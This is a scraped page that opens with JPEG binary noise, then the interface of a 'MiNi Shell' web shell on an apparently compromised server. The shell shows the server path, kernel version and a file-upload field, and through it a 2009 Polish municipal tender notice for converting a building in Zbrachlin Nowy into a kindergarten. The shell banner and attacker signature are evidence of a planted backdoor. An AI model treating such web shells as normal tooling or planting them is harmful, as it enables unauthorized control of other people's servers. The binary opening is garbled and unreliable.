JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090406/92846-N-2009.html

<p class="kh_header"><b>Waganiec: Rozbudowa istniejącego budynku zajęć praktyczno-technicznych z jednoczesną zmianą użytkowania na przedszkole dwuoddziałowe w Zbrachlinie Nowym</b><br>
<b>Numer ogłoszenia: 92846 - 2009; data zamieszczenia: 06.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Waganiec , ul. Dworcowa 11, 87-731 Waganiec, woj. kujawsko-pomorskie, tel. 054 2830044, faks 054 2830640.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ugwaganiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa istniejącego budynku zajęć praktyczno-technicznych z jednoczesną zmianą użytkowania na przedszkole dwuoddziałowe w Zbrachlinie Nowym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia ( z uwzględnieniem postanowień art.2 pkt. 8 oraz art.30 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych) jest rozbudowa istniejącego budynku ZPT z jednoczesną  zmianą użytkowania na przedszkole dwuoddziałowe w  Nowym Zbrachlinie, gmina Waganiec zgodnie z projektami budowlanymi i pozwoleniem na budowę (decyzja AB/7351/98/09) na wydzielonej części działki szkolnej  nr 75/3. Teren działki płaski wyniesiony ponad przebiegającą drogę powiatową Ciechocinek - Siutkowo o numerze 2603C. Istniejący budynek zajęć praktyczno-technicznych w projekcie budowlanym zaadoptowano na pomieszczenia pomocnicze przyszłego przedszkola. Istniejący budynek posiada następujące instalacje: energetyczną i oświetleniową , zimnej wody, kanalizacji sanitarnej, centralnego ogrzewania z istniejącego budynku szkolnego oraz dojazd, chodnik ,taras , zieleń, placyk gospodarczy z usytuowaniem pojemników na odpady komunalne i zjazd na drogę publiczną. Teren jest ogrodzony. Ogrodzenie wymaga wymiany (opis wykonania w zestawieniu nakładów - ogrodzenie terenu).

     Działka szkolna posiada zjazd na drogę powiatową. Istniejące utwardzone place manewrowe pozwalają na swobodny dojazd do budynków. Na dziedzińcu szkolnym nie ma miejsc parkingowych.
    Budynek został zaprojektowany jako jedno kondygnacyjny. Powierzchnia użytkowa wynosi 267m2 i składają  się na nią:
           - pomieszczenia główne: (wiatrołap - 5.67m2, holl, komunikacja - 51,33m2, szatnia  
             oddziału I - 11,14m2, szatnia oddziału II - 11,14m2, sala zajęć oddziału I - 37,88m2,  
             kącik zajęć grupowych oddziału I - 19,76 m2, WC oddziału I 9,39m2, sala zajęć  
             oddziału II - 37,88m2,  kącik zajęć grupowych oddziału II - 19,76 m2, WC oddziału II -  
             9,39m2, 
           - pomieszczenia pomocnicze: wydawanie posiłków - 11,84m2, wiatrołap - 2,38m2,  
             zmywalnia - 8,00m2, pomieszczenie na odpadki -1,98m2, wiatrołap - 2,38m2,  
             komunikacja - 4,80m2, biuro - 14,66m2,WC dla biura - 3,54m2, MOP - 4,08m2.
Wysokość pomieszczeń: pomocniczych 2,70m, dydaktycznych 3,00m.
   Fundamenty i ściany fundamentowe szerokości 45 - 70 cm na ławach zbrojonych podłużnie. Pionowa izolacja fundamentów od poziomu ław płytami styropianowymi. Podłoga grubości 10 cm. Ściany nośne zewnętrzne grubości 24 cm z bloczków gazobetonowych M-600 izolowane zewnętrznie płytami styropianowymi grubości 15 cm z elewacją z zaprawy klejowej. Ściany wewnętrzne  z bloczków gazobetonowych grubości 24 cm. Ściany zakończone wieńcem żelbetowym zbrojonym. Przewody wentylacyjne z pustaków ceramicznych oraz z przewodów giętkich. Nadproża okienne i drzwiowe żelbetowe.
   Stropodach (pomieszczenia dobudowanej części) z wiązarów drewnianych, połacie o nachyleniu 8 stopni pokryte blachą trapezową a w części blachą tłoczoną dachówkopodobną. Ocieplenie płytami z wełny mineralnej półtwardej. Okładzina sufitów z podwójnej warstwy płyt gipsowo-kartonowych.
   Dach (istniejący budynek) konstrukcja drewniana, zabezpieczona środkiem ogniochronnym i grzybobójczym pokryty blachą tłoczoną trapezową i blachą dochówkopodobną. Rynny spustowe z PCV. 
   Tynki i okładziny wewnętrzne: tynki cementowo-wapienne wykończone gładzią gipsową malowane farbami emulsyjnymi, pomieszczenia sanitariatów płytki glazurowane do wys. 2 m. Pomieszczenia poddasza rozdzielone ściankami szkieletowymi kryte płytami kartonowo-gipsowymi na ruszcie stalowym.
   Okna z PCV o podwyższonej izolacyjności termicznej (do 1,10 W/m2*K) z podwójną szybą wypełnioną gazem obojętnym. Drzwi wewnętrzne płytowe o konstrukcji drewnianej lub stalowo-drewnianej, zewnętrzne aluminiowe o podwyższonej izolacyjności termicznej.
   Elewacje zewnętrzne. Kolorystyka elewacji zgodnie z projektem. Dachy i obróbki blacharskie w kolorze ceglastym, okna białe, spadki podokienne z kształtek ceramicznych kolor naturalnej cegły, tynki pocienione mineralne o strukturze piaskowca malowane farbami emulsyjnymi w kolorze kremowym lub piaskowym, posadzka tarasu i stopnie wejściowe z cegły ceramicznej na zaprawie cementowej uplastycznionej.
   Ochrona cieplna budynku: ściana zewnętrzna istniejącego budynku o współczynniku przenikania ciepła przez przegrodę 0,246 W/ m2*K ; ściana zewnętrzna projektowanego budynku  o współczynniku przenikania ciepła przez przegrodę 0,223 W/ m2*K ; podłoga na gruncie z płyt MDF o współczynniku przenikania ciepła przez przegrodę w strefie pierwszej 0,263 W/ m2*K i w strefie drugiej 0,257 W/ m2*K ; strop drewniany  o współczynniku przenikania ciepła przez przegrodę 0,150 W/ m2*K ; przegroda na gruncie - terakota  o współczynniku przenikania ciepła przez przegrodę w strefie pierwszej 0,332 W/ m2*K i w strefie drugiej  0,277 W/ m2*K Izolacja cieplna pozioma grubości 20cm z płyt wełny mineralnej ułożonej w poziomie stropu poddasza i przestrzeni międzybelkowej konstrukcji dachu ; ścian zewnętrznych z płyt styropianowych grubości 15 cm ; cieplna i akustyczna grubości 2 cm z płyt styropianowych; podłoga na poziomie posadzki na stropie przyziemia. 
   Izolacja przeciwwilgociowa budynku wykonana zostanie z 2 warstw papy asfaltowej przełożonych  folia budowlaną w poziomie posadzki i ścian fundamentowych; pozioma z 3 warstw folii polietylenowej na posadzce przyziemia; paroszczelna z folii polietylenowej na poziomie stropu przyziemia.
   Ochrona przeciwpożarowa budynku klasy ZL IV spełnia wymogi odporności ogniowej.
   Instalacje w budynku: elektryczna, oświetleniowa, ogrzewania, wodnokanalizacyjna, wentylacyjna. Elektryczna: oświetleniowa w tynku, osprzęt wtynkowy w zmywalni, sanitariatach na wysokości 1,4m od podłoża; gniazda wtynkowe ze stykiem ochronnym a w sanitariatach, zmywalni szczelne. Ochrona od porażeń w układzie TN-C-S, w rozdzielni elektrycznej zastosowano wyłączniki różnicowo-prądowe o prądzie różnicowym 30mA. Oprawy oświetleniowe przykręcane świetlówkowe. 
Ogrzewanie z kotłowni szkoły grzejnikami typu PURMO lub równoważnymi zasilanymi od dołu z zaworami grzejnikowymi termostatycznymi zasilanymi od najbliższego rozdzielacza, instalacja zasilająca z systemem rozdzielczym z tworzyw sztucznych ułożona w posadzce izolowana pianką poliuretanową.
Ciepłej wody użytkowej (cwu) i cyrkulacji. Doprowadzenie wody zimnej rurami i kształtkami BOR-PLUS lub równoważnymi zgrzewanymi ułożonymi w posadzce. CWU z pojemnościowego podgrzewacza wody o pojemności 300l. Cyrkulacja pompą cyrkulacyjną.
Kanalizacja sanitarna z rur PCV klasy N z rurami wywiewnymi. Umywalki z porcelany sanitarnej, baterie umywalkowe stojące, miski ustępowe wiszące kompaktowe, zawory czerpalne z wylewką, mieszacze ciepłej wody.
Wentylacja w węzłach sanitarnych grawitacyjna przez murowane przewody
   Ogrodzenie budynku przedszkola: od strony północnej i wschodniej z siatki stalowej na słupkach stalowych, od dziedzińca szkoły z elementów metalowych  oraz  z gazonów kwiatowych (opis wykonania w zestawieniu nakładów - ogrodzenie terenu).
     Projektowane zagospodarowanie terenu, dotyczące części działki, na której znajdzie się przedszkole (1431,25m2) przedstawia się następująco:    
           -  wykonanie budynku przedszkola dwuoddziałowego  - pow. zab. -296,72m2,
           -  wykonanie zadaszenie pojemników na odpady stałe - pow. zab - 4,00m2 ,
           -  wykonanie tarasu wejściowego (podjazd dla niepełnosprawnych) - pow. zab - 17,21m2,
           -  wykonanie tarasu wejściowego do zaplecza kuchennego - pow. zab - 15,99m2,
           -  wykonanie zielonej klasy (uwzględnić zagospodarowanie terenu polegające na nawiezieniu  
              ziemi urodzajnej  i obsianie mieszanką trawnikową)- pow. zab. - 115,63m2,
           -  zieleń niska i średnia izolacyjna (w miarę możliwości zachować istniejące nasadzenia- nie  
         dotyczy drzew owocowych)- pow. zab. - 656,00m2,

Roboty budowlane prowadzone będą w bezpośrednim sąsiedztwie Zespołu Szkół w Zbrachlinie w czasie odbywających się zajęć lekcyjnych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.41.00-1, 45.11.12.00-0, 45.11.10.00-8, 45.33.00.00-9, 45.33.11.00-7, 45.31.53.00-1, 45.34.20.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
Ustala się wadium w wysokości 12.000,00 zł. ( słownie: dwanaście tysięcy  zł ).

 Wykonawca wnosi wadium : w pieniądzu, 
 sposób przekazania - na konto Urzędu Gminy Waganiec; ul. Dworcowa 11; 87-731 Waganiec 
 Nr konta :  KBS Aleksandrów Kujawski 51 9537 0000 2005 0050 1624 0001

lub w jednej z poniżej podanych form :

1) w poręczeniach lub gwarancjach bankowych, 
2) w gwarancjach ubezpieczeniowych,
3 w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
Sposób przekazania:  
Przed upływem terminu składania ofert jednak nie później niż w dniu poprzedzającym termin składania ofert (kserokopia dowodu wniesienia wadium stanowi załącznik do oferty ). 
Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego bezwarunkowa wypłata.
Wadium będzie zwrócone bądź zatrzymane w terminie i na warunkach wskazanych w art. 46 ustawy Prawo Zamówień Publicznych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki udziału w postępowaniu.

O udzielenie zamówienia mogą ubiegać się oferenci, którzy spełnią następujące warunki; art. 22 Prawa Zamówień Publicznych. 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy   nakładają  obowiązek poosiadania takich uprawnień,
2) posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;                                               
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Z ubiegania się o udzielenie zamówienia publicznego wyklucza się, zgodnie z art. 24 P Z P :
1) wykonawców , którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie  3 lat przed  wszczęciem postępowania;
2) wykonawców, w stosunku do których otwarto likwidację lub których  upadłość ogłoszono;
3) wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy  uzyskali  oni przewidziane prawem zwolnienie, odroczenie, rozłożenie  na raty zaległych  płatności lub  wstrzymanie w całości wykonania  decyzji właściwego organu;
4) osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo  przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu  lub inne  przestępstwo  popełnione w celu  osiągnięcia  korzyści  majątkowych, 
5) spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie  zamówienia, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo  popełnione w celu osiągnięcia  korzyści majątkowych, 
6) spółki  partnerskie, których partnera lub członka zarządu prawomocnie skazano za  przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu  osiągnięcia korzyści  majątkowych, 
7) spółki komandytowe oraz spółki komandytowo - akcyjne, których komplementariusza prawomocnie skazano za przestępstwo  popełnione w związku  z   postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa  przestępstwo  przeciwko obrotowi gospodarczemu lub inne  przestępstwo  popełnione  w celu  osiągnięcia  korzyści  majątkowych, 
8) osoby prawne, których  urzędującego  członka organu zarządzającego  prawomocnie  skazano za przestępstwo  popełnione  w związku  z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwo  przeciwko  obrotowi gospodarczemu lub inne  przestępstwo popełnione  w celu  osiągnięcia   korzyści  majątkowych,
9) podmioty  zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności  podmiotów  zbiorowych za czyny zabronione  pod groźbą  kary, 
10) wykonawców, którzy nie spełniają warunków   udziału w postępowaniu,  o których  mowa  w art. 22 ust. 1 pkt. 1-3 ustawy PZP.

a  także Wykonawców którzy:
1. nie spełnią wymagań określonych przepisami ustawy prawo zamówień publicznych,
2. nie spełniają warunków udziału w postępowaniu o zamówienie publiczne,
3. wykonywali czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności,
4. złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
5. nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków,
6. nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na  przedłużenie okresu związania ofertą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:

1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji  działalności gospodarczej , że profil działalności Oferenta odpowiada przedmiotowi zamówienia oraz zawierający aktualny wykaz osób uprawnionych do reprezentowania oferenta, wystawiony nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert.
2.Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzających odpowiednio ,że wykonawca nie zalega z opłacaniem podatków , opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie  do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
3. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie  wynikają z przepisów prawa lub innych dokumentów rejestrowych ( w przypadku, gdy uprawnienie osób podpisujących ofertę wynika z przepisów prawa lub innych dokumentów rejestrowych należy złożyć oświadczenie).
4. Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia stosownie do art. 23 ustawy Prawo Zamówień Publicznych - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
5.Aktualna informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy PZP, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie  do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
6.Aktualna informację z Krajowego Rejestru Karnego zakresie określonym w art. 24 ust.1 pkt 9 ustawy PZP, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie  do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
7. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyły w wykonaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych czynności. 
8. Wykaz wykonanych robót budowlanych w okresie  ostatnich 5 latach przed dniem wszczęcia postępowania o udzielenie zamówienia (minimum 2 zadania) , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie ,odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania  oraz załączeniem dokumentów potwierdzających , że roboty te zostały wykonane należycie.
9. Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
10. Sprawozdanie finansowe albo jego części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za ostatnie dwa okresy obrachunkowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność z oryginałem przez osobę / osoby uprawnioną do podpisania oferty    z dopiskiem za zgodność z oryginałem.

Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów oraz informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty te są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. Dokumenty sporządzone w języku obcym składane są wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.

Dokumenty wymagane w przypadku składania oferty wspólnej
1).Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia stosownie do art. 23  ustawy Prawo Zamówień Publicznych - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
2).Oferta winna zawierać dokumenty wyszczególnione w rozdziale VI punkty 1- 9 dla każdego partnera z osobna.

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność z oryginałem przez osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.ugwaganiec.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.ugwaganiec.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 11:15, miejsce: Urząd Gminy Waganiec, 87-731 Waganiec, ul. Dworcowa 11, sekretariat, I piętro, pokój nr 13..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com